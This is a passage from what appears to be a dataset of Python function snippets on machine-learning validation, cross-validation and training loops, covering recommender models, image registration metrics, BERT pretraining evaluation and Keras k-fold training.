self.__context_array__, self.__ratings__, self.fold, self.lr, self.factors)\n predictions, losses = cu.fit()\n elif (self.type_camf == 'CAMF_C'):\n c = camf_c.C_class(self.__users_array__, self.__items_array__, self.__context_array__, self.__ratings__, self.fold, self.lr, self.factors)\n predictions, losses = c.fit()\n\n dummy_pred = np.zeros((predictions.shape))\n for r, pred_array in enumerate(predictions):\n for c, pred in enumerate(pred_array):\n dummy_pred[r][c] = self.__check_ratings__(pred)\n predictions = dummy_pred\n #save a plot with a loss function\n plots = prs.PlotRSData()\n #print(losses)\n plots.plot_loss_cars(losses, self.type_camf, self.__save_prefix__+\"_loop\"+str(self.loop))\n pd.DataFrame(losses).to_csv(\"./RecSys/out/CAMF/train/\"+self.type_camf+\"/\" + self.__save_prefix__ +\"losses_loop\"+str(self.loop)+\".csv\")\n print('Saving the feature matrix...')\n # set predictions back to the pivot table\n self.__utility_saved_training__(predictions) \n # save results\n self.utility_predictions.to_csv(\"./RecSys/out/CAMF/train/\"+self.type_camf+\"/\" + self.__save_prefix__ + \"_SGD_predictions_loop\"+str(self.loop)+\".csv\")", "def cross_validation(self, x, t):\n # Initialize accuracy / hyperparameters\n best_accuracy = 0.0\n best_reg = 0.0\n\n # Cross-validation 80-20\n N = x.shape[0]\n N_train = int(math.floor(0.8 * N))\n\n # Initialize the grid search hyperparameters\n min_reg = 0.001\n max_reg = 1000\n log_min_reg = np.log(min_reg)\n log_max_reg = np.log(max_reg)\n reg_list = np.logspace(log_min_reg, log_max_reg, num=7, base=math.e)\n\n for reg in reg_list:\n accuracy = np.zeros((self.k_fold))\n for i in range(self.k_fold):\n map_index = list(zip(x, t))\n random.shuffle(map_index)\n random_x, random_t = zip(*map_index)\n\n train_x = random_x[:N_train]\n valid_x = 
random_x[N_train:]\n train_t = random_t[:N_train]\n valid_t = random_t[N_train:]\n\n self.model = sklearn.neural_network.MLPClassifier(self.hidden_layer_sizes,\n activation=self.activation,\n alpha=reg, max_iter=1000, \n random_state=self.random_state)\n self.train(train_x, train_t)\n accuracy[i] = self.model.score(valid_x, valid_t)\n\n mean_accuracy = np.mean(accuracy)\n # print(mean_accuracy)\n if mean_accuracy > best_accuracy:\n best_accuracy = mean_accuracy\n best_reg = reg\n print(\"The new best hyperparameters are : \", best_reg)\n\n print(\"Best hyperparameters are : \", best_reg)\n print(\"Valid Accuracy :\", best_accuracy)\n self.reg = best_reg\n self.model = sklearn.neural_network.MLPClassifier(self.hidden_layer_sizes,\n activation=self.activation,\n alpha=best_reg, max_iter=1000, \n random_state=self.random_state)\n self.train(x, t)", "def cross_validate(pipeline, data, cv=4):\n print \"Running cross validation...\"\n (Xcv, ycv) = data\n kfold = KFold(n_splits=cv, shuffle=True, random_state=42)\n results = []\n for train_idx, val_idx in kfold.split(Xtrain):\n pipeline.fit(Xcv[train_idx], ycv[train_idx])\n results.append(accuracy_score(\n ycv[val_idx], pipeline.predict(Xcv[val_idx])\n ))\n print \"{} +/- {}\".format(np.mean(results), np.std(results))", "def validate(inputs):\n print \"running validation\"\n my_data = genfromtxt(inputs, delimiter='\\t',skip_header=0)\n n_col = my_data.shape[1]\n n_features=n_col-1 #assuming that the latest column\n #contains the the outputs \n #processing data without targets\n X = preprocessing.scale(np.hsplit(my_data,[n_features,n_col])[0])\n Y = np.squeeze(np.asarray(np.hsplit(my_data,[n_features,n_col])[1]))\n #for further information about parameters, please google sklearn docs\n parameters = {'kernel':('sigmoid', 'rbf'), 'C':[.1,.2,1.0],'cache_size':[500]}\n svr = svm.SVC()\n clf = grid_search.GridSearchCV(svr, parameters,n_jobs=3)\n sys.stdout.write(\"%s:validating... 
\"%(strftime(\"%Y-%m-%d %H:%M:%S\", gmtime())))\n output = clf.fit(X,Y)\n print output\n print \"(%s) DONE.\" % (strftime(\"%Y-%m-%d %H:%M:%S\", gmtime()))\n sys.exit(0)", "def test(model, dataloader, params, args, val):\n\n # evaluation mode\n model.eval()\n\n # initialise buffers\n dice_lv_buffer = []\n dice_myo_buffer = []\n dice_rv_buffer = []\n\n mcd_lv_buffer = []\n hd_lv_buffer = []\n mcd_myo_buffer = []\n hd_myo_buffer = []\n mcd_rv_buffer = []\n hd_rv_buffer = []\n\n mean_mag_grad_detJ_buffer = []\n negative_detJ_buffer = []\n\n\n with tqdm(total=len(dataloader)) as t:\n # iterate over validation subjects\n for idx, (image_ed_batch, image_es_batch, label_ed_batch, label_es_batch) in enumerate(dataloader):\n # (data all in shape of (c, N, H, W))\n\n # extend to (N, c, H, W)\n image_ed_batch = image_ed_batch.permute(1, 0, 2, 3).to(device=args.device)\n image_es_batch = image_es_batch.permute(1, 0, 2, 3).to(device=args.device)\n label_es_batch = label_es_batch.permute(1, 0, 2, 3).to(device=args.device)\n\n with torch.no_grad():\n # compute optical flow and warped ED images towards ES\n dvf = model(image_ed_batch, image_es_batch)\n\n # transform label mask of ES frame\n warped_label_es_batch = resample_transform(label_es_batch.float(), dvf, interp='nearest')\n\n\n \"\"\" Move data to device \"\"\"\n if args.cuda:\n # move data to cpu to calculate metrics\n # (the axis permutation is to comply with metric calculation code which takes input shape H, W, N)\n warped_label_es_batch = warped_label_es_batch.squeeze(1).cpu().numpy().transpose(1, 2, 0)\n label_ed_batch = label_ed_batch.squeeze(0).numpy().transpose(1, 2, 0)\n dvf = dvf.data.cpu().numpy().transpose(0, 2, 3, 1) # (N, H, W, 2)\n else:\n # CPU version of the code\n warped_label_es_batch = warped_label_es_batch.squeeze(1).numpy().transpose(1, 2, 0)\n label_ed_batch = label_ed_batch.squeeze(0).numpy().transpose(1, 2, 0)\n dvf = dvf.data.numpy().transpose(0, 2, 3, 1) # (N, H, W, 2)\n \"\"\"\"\"\"\n\n \"\"\" Calculate the metrics (only works with SAX images) \"\"\"\n # (optional) extract 3 slices (apical, mid-ventricle and basal)\n if not args.all_slices:\n num_slices = label_ed_batch.shape[-1]\n apical_idx = int(round((num_slices - 1) * 0.75)) # 75% from basal\n mid_ven_idx = int(round((num_slices - 1) * 0.5)) # 50% from basal\n basal_idx = int(round((num_slices - 1) * 0.25)) # 25% from basal\n slices_idx = [apical_idx, mid_ven_idx, basal_idx]\n\n warped_label_es_batch = warped_label_es_batch[:, :, slices_idx]\n label_ed_batch = label_ed_batch[:, :, slices_idx]\n dvf = dvf[slices_idx, :, :, :] # needed for detJac\n\n # dice\n dice_lv = categorical_dice_stack(warped_label_es_batch, label_ed_batch, label_class=1)\n dice_myo = categorical_dice_stack(warped_label_es_batch, label_ed_batch, label_class=2)\n dice_rv = categorical_dice_stack(warped_label_es_batch, label_ed_batch, label_class=3)\n\n dice_lv_buffer += [dice_lv]\n dice_myo_buffer += [dice_myo]\n dice_rv_buffer += [dice_rv]\n\n # contour distances\n mcd_lv, hd_lv = contour_distances_stack(warped_label_es_batch, label_ed_batch, label_class=1, dx=params.pixel_size)\n mcd_myo, hd_myo = contour_distances_stack(warped_label_es_batch, label_ed_batch, label_class=2, dx=params.pixel_size)\n mcd_rv, hd_rv = contour_distances_stack(warped_label_es_batch, label_ed_batch, label_class=3, dx=params.pixel_size)\n\n # determinant of Jacobian\n mean_grad_detJ, mean_negative_detJ = detJac_stack(dvf)\n\n\n # update buffers\n mcd_lv_buffer += [mcd_lv]\n hd_lv_buffer += [hd_lv]\n mcd_myo_buffer += 
[mcd_myo]\n hd_myo_buffer += [hd_myo]\n mcd_rv_buffer += [mcd_rv]\n hd_rv_buffer += [hd_rv]\n\n mean_mag_grad_detJ_buffer += [mean_grad_detJ]\n negative_detJ_buffer += [mean_negative_detJ]\n\n t.update()\n\n # construct metrics dict\n metrics = {'dice_lv_mean': np.mean(dice_lv_buffer), 'dice_lv_std': np.std(dice_lv_buffer),\n 'dice_myo_mean': np.mean(dice_myo_buffer), 'dice_myo_std': np.std(dice_myo_buffer),\n 'dice_rv_mean': np.mean(dice_rv_buffer), 'dice_rv_std': np.std(dice_rv_buffer),\n\n 'mcd_lv_mean': np.mean(mcd_lv_buffer), 'mcd_lv_std': np.std(mcd_lv_buffer),\n 'mcd_myo_mean': np.mean(mcd_myo_buffer), 'mcd_myo_std': np.std(mcd_myo_buffer),\n 'mcd_rv_mean': np.mean(mcd_rv_buffer), 'mcd_rv_std': np.std(mcd_rv_buffer),\n\n 'hd_lv_mean': np.mean(hd_lv_buffer), 'hd_lv_std': np.std(hd_lv_buffer),\n 'hd_myo_mean': np.mean(hd_myo_buffer), 'hd_myo_std': np.std(hd_myo_buffer),\n 'hd_rv_mean': np.mean(hd_rv_buffer), 'hd_rv_std': np.std(hd_rv_buffer),\n\n 'mean_mag_grad_detJ_mean': np.mean(mean_mag_grad_detJ_buffer),\n 'mean_mag_grad_detJ_std': np.std(mean_mag_grad_detJ_buffer),\n\n 'negative_detJ_mean': np.mean(negative_detJ_buffer),\n 'negative_detJ_std': np.std(negative_detJ_buffer)\n }\n\n\n if not val:\n # testing only: save all metrics evaluated for all test subjects in pandas dataframe\n test_result_dir = os.path.join(args.model_dir, \"test_results\")\n if not os.path.exists(test_result_dir):\n os.makedirs(test_result_dir)\n\n # save metrics results mean & std\n xutils.save_dict_to_json(metrics,\n f\"{test_result_dir}/test_results_3slices_{not args.all_slices}.json\")\n\n # save accuracy metrics of every subject\n subj_id_buffer = dataloader.dataset.dir_list\n df_buffer = []\n column_method = ['DL'] * len(subj_id_buffer)\n for struct in ['LV', 'MYO', 'RV']:\n if struct == 'LV':\n ls_dice = dice_lv_buffer\n ls_mcd = mcd_lv_buffer\n ls_hd = hd_lv_buffer\n elif struct == 'MYO':\n ls_dice = dice_myo_buffer\n ls_mcd = mcd_myo_buffer\n ls_hd = hd_myo_buffer\n elif struct == 'RV':\n ls_dice = dice_rv_buffer\n ls_mcd = mcd_rv_buffer\n ls_hd = hd_rv_buffer\n\n ls_struct = [struct] * len(subj_id_buffer)\n data = {'Method': column_method,\n 'ID': subj_id_buffer,\n 'Structure': ls_struct,\n 'Dice': ls_dice,\n 'MCD': ls_mcd,\n 'HD': ls_hd}\n df_buffer += [pd.DataFrame(data=data)]\n # concatenate df and save\n metrics_df = pd.concat(df_buffer, axis=0)\n metrics_df.to_pickle(f\"{test_result_dir}/test_accuracy_results_3slices_{not args.all_slices}.pkl\")\n\n # save detJac metrics for every subject\n jac_data = {'Method': column_method,\n 'ID': subj_id_buffer,\n 'GradDetJac': mean_mag_grad_detJ_buffer,\n 'NegDetJac': negative_detJ_buffer}\n jac_df = pd.DataFrame(data=jac_data)\n jac_df.to_pickle(f\"{test_result_dir}/test_Jacobian_results_3slices{not args.all_slices}.pkl\")\n\n return metrics", "def cross_valid_key(model,x,key,preds,target,metric,verbose=True): \r\n\r\n score=[]\r\n \r\n keys = x[key].unique().tolist()\r\n \r\n\r\n\r\n for idx, item in enumerate([1,2,3,4,5]):\r\n\r\n xtrain,xtest = split_camp(x,keys,0.2)\r\n \r\n model.fit(xtrain[feat],xtrain[target])\r\n\r\n ypred = model.predict(xtest[feat])\r\n \r\n ytrue= xtest[target].values \r\n \r\n if metric == 'mae':\r\n score.append(mae(ytrue,ypred))\r\n elif metric == 'mse':\r\n score.append(mse(ytrue,ypred))\r\n elif metric == 'rrmse':\r\n score.append(rrmse(ytrue,ypred))\r\n\r\n else:\r\n score.append(rmse(xtest[target].tolist(),ypred))\r\n\r\n if verbose:\r\n print('-'*30)\r\n print(f'\\nFold {idx} out of 5')\r\n print(f'Key {item}')\r\n 
print(f'{metric}: {score[idx]}')\r\n\r\n \r\n\r\n if verbose:\r\n print(f'\\n Overall Score:')\r\n print(f'{metric}: Mean: {np.mean(score)} Std: {np.std(score)}')\r\n\r\n\r\n return score", "def run_validation(self):\n # Build a list of validation .hdf5 file paths:\n files = []\n for fname in os.listdir(self.hdf5_directory):\n fpath = os.path.join(self.hdf5_directory, fname)\n if os.path.isfile(fpath) and fname.startswith('validation.') and fname.endswith('.hdf5'):\n files.append(fpath)\n f_start_id = 0\n files.sort()\n num_files = len(files)\n\n # Select first .hdf5 file\n if \\\n torch.distributed.is_initialized() \\\n and torch.distributed.get_world_size() > num_files:\n\n remainder = torch.distributed.get_world_size() % num_files\n hdf5_fpath = files[\n (\n f_start_id * torch.distributed.get_world_size()\n + torch.distributed.get_rank()\n + remainder * f_start_id\n ) % num_files\n ]\n else:\n hdf5_fpath = files[\n (\n f_start_id * torch.distributed.get_world_size()\n + torch.distributed.get_rank()\n ) % num_files\n ]\n\n # Set previous_file variable for next iteration\n previous_file = hdf5_fpath\n\n # Load the pre-training data from the .hdf5 file\n pretraining_data = PretrainingDataset(\n hdf5_fpath=hdf5_fpath,\n max_masked_tokens_per_input=self.max_masked_tokens_per_input\n )\n validation_sampler = RandomSampler(pretraining_data) # This could be SequentialSampler\n validation_dataloader = DataLoader(\n pretraining_data,\n sampler=validation_sampler,\n batch_size=self.batch_size * self.n_gpu,\n num_workers=4, pin_memory=True\n )\n\n steps = 0\n average_loss = 0.0 # averaged loss every self.log_freq steps\n\n # Use model in `evaluation mode`\n with torch.no_grad():\n self.model.eval()\n if self.is_main_process:\n logging.info(\"*************************\")\n logging.info(\"** Evaluation step **\")\n logging.info(\"*************************\")\n\n # Loop over the rest of pre-training data files\n pool = ProcessPoolExecutor(1)\n if len(files) == 1:\n f_start_id = -1\n for f_id in range(f_start_id + 1, 1 + len(files)//torch.distributed.get_world_size()):\n\n # Submit creation of next DataLoader\n if torch.distributed.get_world_size() > num_files:\n hdf5_fpath = files[\n (\n f_id * torch.distributed.get_world_size()\n + torch.distributed.get_rank()\n + remainder * f_id\n ) % num_files\n ]\n else:\n hdf5_fpath = files[\n (\n f_id * torch.distributed.get_world_size()\n + torch.distributed.get_rank()\n ) % num_files\n ]\n if self.is_main_process:\n logging.info(\n \"Local rank: %s | File n° %s: %s\",\n self.local_rank, f_id, os.path.basename(previous_file)\n )\n previous_file = hdf5_fpath\n dataset_future = pool.submit(\n create_pretraining_dataloader,\n hdf5_fpath,\n self.max_masked_tokens_per_input,\n self.batch_size * self.n_gpu,\n )\n\n # Iterate over batches (w/ progress bar for main process)\n validation_batches = tqdm(\n validation_dataloader,\n desc=\"Computing loss on the validation set...\"\n ) if self.is_main_process else validation_dataloader\n for batch in validation_batches:\n steps += 1\n (\n input_ids,\n segment_ids,\n input_mask,\n masked_lm_labels,\n next_sentence_labels\n ) = [tensor.to(self.device) for tensor in batch]\n\n # Forward Pass\n model_output = self.model(\n input_ids=input_ids,\n token_type_ids=segment_ids,\n attention_mask=input_mask,\n labels=masked_lm_labels,\n next_sentence_label=next_sentence_labels)\n loss = model_output['loss']\n if self.n_gpu > 1:\n loss = loss.mean() # mean() to average on multi-gpu.\n\n divisor = self.num_accumulation_steps\n if 
self.num_accumulation_steps > 1:\n if not self.allreduce_post_accumulation:\n # this division was merged into predivision\n loss = loss / self.num_accumulation_steps\n divisor = 1.0\n\n # Update average\n average_loss += loss.item()\n \n # Move to next file after using up all batches of current file\n del validation_dataloader\n validation_dataloader, hdf5_fpath = \\\n dataset_future.result(timeout=None)\n\n del validation_dataloader\n\n num_steps = max(1, int(steps / self.num_accumulation_steps))\n average_loss = torch.tensor(average_loss, dtype=torch.float32).cuda()\n average_loss = average_loss / (num_steps * divisor)\n if torch.distributed.is_initialized():\n average_loss /= torch.distributed.get_world_size()\n torch.distributed.all_reduce(average_loss)\n\n # Check if model has improved\n validation_loss = average_loss.item()\n model_has_improved = False\n if validation_loss < self.best_validation_loss:\n model_has_improved = True\n self.best_validation_loss = validation_loss\n\n # Log\n if self.is_main_process:\n logging.info(\n \"\\nTotal Validation Steps: %s | Validation Loss = %.3f\",\n num_steps, validation_loss\n )\n self.tensorboard_writer.add_scalar(\n \"Avg. validation loss\", validation_loss,\n global_step=self.global_step\n )\n\n # NOTE: /!\\ Put model back in `training mode`\n self.model.train()\n\n return model_has_improved", "def validate(val_loader, model, criterion, epoch, opt):\n # switch to evaluate mode\n model.eval()\n\n top1 = utils.AverageMeter()\n\n for i, (input_points, _labels, segs) in enumerate(val_loader):\n # bz x 2048 x 3 \n input_points = Variable(input_points, volatile=True)\n input_points = input_points.transpose(2, 1)\n _labels = _labels.long() # this will be feed to the network \n segs = segs.long()\n labels_onehot = utils.labels_batch2one_hot_batch(_labels, opt.num_classes)\n segs = Variable(segs, volatile=True) \n labels_onehot = Variable(labels_onehot, volatile=True)\n\n if opt.cuda:\n input_points = input_points.cuda() \n segs = segs.cuda() # must be long cuda tensor \n labels_onehot = labels_onehot.float().cuda() # this will be feed into the network\n \n # forward, backward optimize \n pred, _, _ = model(input_points, labels_onehot)\n pred = pred.view(-1, opt.num_seg_classes)\n segs = segs.view(-1, 1)[:, 0] # min is already 0\n # debug_here() \n loss = criterion(pred, segs) \n\n pred_choice = pred.data.max(1)[1]\n correct = pred_choice.eq(segs.data).cpu().sum()\n\n acc = correct/float(opt.batch_size * opt.num_points)\n top1.update(acc, input_points.size(0))\n\n if i % opt.print_freq == 0:\n print('[%d: %d] val loss: %f accuracy: %f' %(i, len(val_loader), loss.data[0], acc))\n # print(tested_samples)\n return top1.avg", "def run_cross_validation_create_models(nfolds=10):\n print(\"nfold value=\",nfolds)\n x_train, y_train, x_train_id = load_images_train()\n print(len(x_train))\n\n # input image dimensions\n batch_size = 16\n nb_epoch = 32\n random_state = 159\n\n seed = 7\n np.random.seed(seed)\n kfold = StratifiedKFold(n_splits=nfolds, shuffle=True, random_state=random_state)\n #kfold = StratifiedShuffleSplit(n_splits=nfolds,test_size=0.1,train_size=0.7,random_state=random_state)\n cvscores = []\n models = []\n\n image_array = np.asarray(x_train, dtype=np.float32)\n # print(image_array.shape)\n\n datagen_test = ImageDataGenerator(\n featurewise_center=True,\n featurewise_std_normalization=True,\n preprocessing_function=pre_processing_image\n )\n\n datagen = ImageDataGenerator(\n rotation_range=20,\n width_shift_range=0.2,\n 
height_shift_range=0.2,\n shear_range=0.2,\n zoom_range=0.2,\n preprocessing_function=pre_processing_image,\n vertical_flip=True,\n horizontal_flip=True,\n fill_mode='nearest'\n )\n\n start_time = time.time()\n print(\"Datagen.fit started\")\n datagen.fit(image_array, augment=True, rounds=3)\n print('Fit Completed: {} seconds'.format(round(time.time() - start_time, 2)))\n\n img_label = np_utils.to_categorical(y_train, 8)\n\n yfull_train = dict()\n num_fold = 0\n sum_score = 0\n\n for train_index, test_index in kfold.split(x_train, y_train):\n # create model\n model = create_model()\n train_x = image_array[train_index]\n train_y = img_label[train_index]\n validate_x = image_array[test_index]\n validate_y = img_label[test_index]\n\n num_fold += 1\n print('Start KFold number {} from {}'.format(num_fold, nfolds))\n print('Split train: ', len(train_x), len(train_y))\n print('Split valid: ', len(validate_x), len(validate_y))\n\n callbacks = [EarlyStopping(monitor='val_loss', min_delta=0, patience=4, verbose=1, mode='auto')]\n\n model.fit_generator(generator=datagen.flow(train_x, train_y, batch_size=batch_size, shuffle=True),\n steps_per_epoch=len(image_array)/32, epochs=nb_epoch, verbose=1,\n callbacks=callbacks,validation_data=(validate_x,validate_y),\n validation_steps=len(image_array)/32)\n\n predictions_valid = model.predict(validate_x.astype('float32'), batch_size=batch_size, verbose=1)\n\n\n score = log_loss(validate_y, predictions_valid)\n print('Score log_loss: ', score)\n\n\n sum_score += score * len(test_index)\n\n # Store valid predictions\n for i in range(len(test_index)):\n yfull_train[test_index[i]] = predictions_valid[i]\n\n models.append(model)\n\n score = sum_score / len(x_train)\n print(\"Log_loss train independent avg: \", score)\n\n info_string = 'loss_' + str(score) + '_folds_' + str(10) + '_ep_' + str(28)\n return info_string,models", "def validate(model,dataloader,criterions,epoch,plots):\n # switch to evaluate mode\n model.eval()\n\n running_loss = 0.0\n running_oa = 0.0\n running_moa = 0.0\n\n avg_losses={}\n avg_accuracies={}\n avg_moas={}\n for i in range(6):\n avg_losses[i] = AverageMeter()\n avg_accuracies[i] = AverageMeter()\n avg_moas[i] = AverageMeter()\n\n tq_bar = tqdm(enumerate(dataloader),total=len(dataloader),ncols=80,desc='Testing')\n for batch_id, (images, labels_group) in tq_bar:\n # if i>25:\n # break\n if torch.cuda.is_available():\n images = [Variable(image.cuda()) for image in images]\n labels_group = [labels for labels in labels_group]\n else:\n print('Cuda not available')\n images = [Variable(image) for image in images]\n labels_group = [labels for labels in labels_group]\n\n\n batch_losses = []\n batch_accuracies = []\n batch_moas = []\n\n for img, labels in zip(images, labels_group):\n outputs = model(img)\n net_batch_size = outputs[0].size(0)\n if torch.cuda.is_available():\n labels = [Variable(label.cuda()) for label in labels]\n else:\n labels = [Variable(label) for label in labels]\n for i,pair in enumerate(zip(outputs, labels)):\n accuracy = accuracy_dense(pair[0].data, pair[1].data)\n moa,_ = mAP_dense(pair[0].data, pair[1].data)\n batch_losses.append(criterions[i](pair[0], pair[1]))\n batch_accuracies.append(accuracy)\n batch_moas.append(moa)\n\n for i in range(6):\n avg_losses[i].update(batch_losses[i].data[0], net_batch_size)\n avg_accuracies[i].update(batch_accuracies[i], net_batch_size)\n avg_moas[i].update(batch_moas[i], net_batch_size)\n\n ## LOSS COMPUTATION\n # loss_weight = [auto_loss_weight(0,epoch), auto_loss_weight(1,epoch), 
auto_loss_weight(2,epoch), auto_loss_weight(3,epoch), auto_loss_weight(4,epoch)]\n if epoch < 40:\n loss_weight = [0.1, 0.1, 0.1, 0.1, 0.1, 0.5]\n else:\n loss_weight = [0.5, 0.1, 0.1, 0.1, 0.1, 0.1]\n\n # loss_weight = [1., 0.01, 0.01, 0.01, 0.01, 0.01] # fait converger en OA la HD layer\n loss_weight = [1.,0.7, 0.6, 0.5, 0.1, 0.05, 0.01]\n\n total_batch_loss = 0\n for w, l in zip(loss_weight, batch_losses):\n total_batch_loss += w*l\n\n\n running_loss += total_batch_loss.data[0]\n # running_oa += oa\n # running_hd_moa += hd_moa\n for i in range(6):\n plots.plot(\"Total loss (running)\", \"val \"+str(i), epoch*len(dataloader)+batch_id+1, avg_losses[i].val)\n plots.plot(\"OA (running)\", \"val \"+str(i), epoch*len(dataloader)+batch_id+1, avg_accuracies[i].val)\n plots.plot(\"mOA (running)\", \"val \"+str(i), epoch*len(dataloader)+batch_id+1, avg_moas[i].val)\n for i in range(6):\n plots.plot(\"Total loss (final mean of epoch)\", \"val \"+str(i), epoch+1, avg_losses[i].val)\n plots.plot(\"OA (final mean of epoch)\", \"val \"+str(i), epoch+1, avg_accuracies[i].val)\n plots.plot(\"mOA (final mean of epoch)\", \"val \"+str(i), epoch+1, avg_moas[i].val)", "def crossTrain(data, labels, outDir, modelsPer, validator, params):\n\tcompleted = 0\n\tresults = []\n\n\tout = open(join(outDir, \"log.txt\"), \"a\")\n\n\t#for each fold split the data and train models keeping the best\n\tfor i, partition in enumerate(validator.partition(data,params.eventMap.matrixToIndex(labels))):\n\n\t\tif params.limit and completed == params.limit:\n\t\t\treturn results\n\n\t\tprint(\"Fold {}\".format(i))\n\n\t\t#create the output directory\n\t\tfoldDir = join(outDir, \"fold{}\".format(i))\n\n\t\tif not os.access(foldDir, os.F_OK):\n\t\t\tmkdir(foldDir)\n\n\t\t\tprint(\"Training Size {}, Dev Size {}\".format(len(partition[0]), len(partition[1])))\n\n\t\t\t#train models\n\t\t\tbestScore, rnd, epoch, best = trainOnFold(data, labels, foldDir, modelsPer, partition, params)\n\n\t\t\tprint(\"Best Score {}\".format(bestScore))\n\n\t\t\tout.write(\"Round {}, Epoch {}, Score {}\\n\".format(rnd, epoch, bestScore))\n\t\t\tout.flush()\n\t\t\tos.fsync(out)\n\n\t\t\tresults.append(best)\n\t\t\tcompleted += 1\n\t\telse:\n\t\t\tprint(\"Fold {} already exists\".format(i))\n\n\tout.close()\n\n\treturn results", "def fit_model(args, model, files, batchsize, var_targets, epoch, shuffle, n_events=None, tb_logger=False):\n\n train_steps_per_epoch = int(getNumEvents(files['train']) / batchsize)\n # validation_steps = int(min([getNumEvents(files['val']), 5000]) / batchsize)\n validation_steps = int(getNumEvents(files['val']) / batchsize)\n genVal = generate_batches_from_files(files['val'], batchsize=batchsize, wires=args.wires, class_type=var_targets, yield_mc_info=0)\n\n callbacks = []\n csvlogger = ks.callbacks.CSVLogger(args.folderOUT + 'history.csv', separator='\\t', append=args.resume)\n modellogger = ks.callbacks.ModelCheckpoint(args.folderOUT + 'models/weights-{epoch:03d}.hdf5', save_weights_only=True, period=1)\n lrscheduler = ks.callbacks.LearningRateScheduler(LRschedule_stepdecay, verbose=1)\n epochlogger = EpochLevelPerformanceLogger(args=args, files=files['val'], var_targets=var_targets)\n batchlogger = BatchLevelPerformanceLogger(display=5, skipBatchesVal=40, steps_per_epoch=train_steps_per_epoch, args=args, #15, 20\n genVal=generate_batches_from_files(files['val'], batchsize=batchsize, wires=args.wires, class_type=var_targets, yield_mc_info=0)) #batchsize//2\n callbacks.append(csvlogger)\n callbacks.append(modellogger)\n 
callbacks.append(lrscheduler)\n callbacks.append(batchlogger)\n # callbacks.append(epochlogger)\n if tb_logger is True:\n print 'TensorBoard Log Directory:'\n print args.folderRUNS + 'tb_logs/%s'%(args.folderOUT[args.folderOUT.rindex('/', 0, len(args.folderOUT) - 1) + 1 : -1])\n tensorlogger = TensorBoardWrapper(generate_batches_from_files(files['val'], batchsize=batchsize, wires=args.wires, class_type=var_targets, yield_mc_info=0),\n nb_steps=validation_steps, log_dir=(args.folderRUNS + 'tb_logs/%s'%(args.folderOUT[args.folderOUT.rindex('/', 0, len(args.folderOUT) - 1) + 1 : -1])),\n histogram_freq=1, batch_size=batchsize, write_graph=True, write_grads=True, write_images=True)\n callbacks.append(tensorlogger)\n\n epoch = (int(epoch[0]), int(epoch[1]))\n print 'training from:', epoch\n\n print 'training steps:', train_steps_per_epoch\n print 'validation steps:', validation_steps\n\n model.fit_generator(\n generate_batches_from_files(files['train'], batchsize=batchsize, wires=args.wires, class_type=var_targets, yield_mc_info=0),\n steps_per_epoch=train_steps_per_epoch,\n epochs=epoch[0]+epoch[1],\n initial_epoch=epoch[0],\n verbose=1,\n max_queue_size=10,\n validation_data=genVal,\n validation_steps=validation_steps,\n callbacks=callbacks)\n\n print 'Model performance\\tloss\\t\\taccuracy'\n print '\\tTrain:\\t\\t%.4f\\t\\t%.4f' % tuple(model.evaluate_generator(generate_batches_from_files(files['train'], batchsize, args.wires, var_targets), steps=50))\n print '\\tValid:\\t\\t%.4f\\t\\t%.4f' % tuple(model.evaluate_generator(generate_batches_from_files(files['val'] , batchsize, args.wires, var_targets), steps=50))\n return model", "def validate(val_loader, model, criterion, epoch):\n global args, writer\n batch_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n\n # switch to evaluate mode\n model.eval()\n #if not args.multi_gpu:\n # if model.beta_ema > 0:\n # old_params = model.get_params()\n # model.load_ema_params()\n #else:\n # if model.module.beta_ema > 0:\n # old_params = model.module.get_params()\n # model.module.load_ema_params()\n end = time.time()\n loss_part = []\n acc_part = []\n with torch.no_grad():\n for i, (input_, target) in enumerate(val_loader):\n if torch.cuda.is_available():\n target = target.cuda(async=True)\n input_ = input_.cuda()\n #input_var = torch.autograd.Variable(input_, volatile=True)\n #target_var = torch.autograd.Variable(target, volatile=True)\n\n # compute output\n output = model(input_)\n preds = output.max(dim=1)[1]\n loss = criterion(output, target, model)\n\n # measure accuracy and record loss\n #prec1 = accuracy(output.data, target, topk=(1,))[0]\n prec1 = (preds == target).sum().item() / preds.size(0)\n losses.update(loss.item(), input_.size(0))\n top1.update(100 - prec1*100, input_.size(0))\n loss_part.append(loss.item())\n acc_part.append(prec1)\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if (i+1) % args.print_freq == 0 and args.verbose:\n print('Test: [{0}/{1}]\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Err@1 {top1.val:.3f} ({top1.avg:.3f})'.format(\n i, len(val_loader), batch_time=batch_time, loss=losses,\n top1=top1))\n if args.verbose:\n print(' * Err@1 {top1.avg:.3f}'.format(top1=top1))\n #if not args.multi_gpu:\n # if model.beta_ema > 0:\n # model.load_params(old_params)\n #else:\n # if model.module.beta_ema > 0:\n # model.module.load_params(old_params)\n\n # log to TensorBoard\n if writer is not None:\n 
writer.add_scalar('val/loss', losses.avg, epoch)\n writer.add_scalar('val/err', top1.avg, epoch)\n writer.add_scalar('val/acc', np.mean(acc_part))\n layers = model.layers if not args.multi_gpu else model.module.layers\n for k, layer in enumerate(layers):\n if hasattr(layer, 'qz_loga'):\n mode_z = layer.sample_z(1, sample=0).view(-1)\n writer.add_histogram('mode_z/layer{}'.format(k), mode_z.cpu().data.numpy(), epoch)\n\n return np.mean(loss_part), np.mean(acc_part)", "def cross_validation_visualization(lambdas, loss_train, loss_test):\n plt.semilogx(lambdas, loss_train, marker=\".\", color='b', label='train error')\n plt.semilogx(lambdas, loss_test, marker=\".\", color='r', label='test error')\n plt.xlabel(\"lambda\")\n plt.ylabel(\"rmse\")\n plt.title(\"cross validation\")\n plt.legend(loc=2)\n plt.grid(True)\n plt.savefig(\"cross_validation_mse\")", "def validate(model, loader, loss_function,\n device, step, tb_logger=None):\n # set the model to eval mode\n model.eval()\n n_batches = len(loader)\n\n # we record the loss and the predictions / labels for all samples\n mean_loss = 0\n predictions = []\n labels = []\n\n # the model parameters are not updated during validation,\n # hence we can disable gradients in order to save memory\n with torch.no_grad():\n for x, y in loader:\n x = x.to(device)\n y = y.to(device)\n prediction = model(x)\n\n # update the loss\n # the loss function expects a 1d tensor, so we get rid of the second\n # singleton dimensions that is added by the loader when stacking across the batch function\n mean_loss += loss_function(prediction, y[:, 0]).item()\n\n # compute the most likely class predictions\n # note that 'max' returns a tuple with the\n # index of the maximun value (which correponds to the predicted class)\n # as second entry\n prediction = prediction.max(1, keepdim=True)[1]\n\n # store the predictions and labels\n 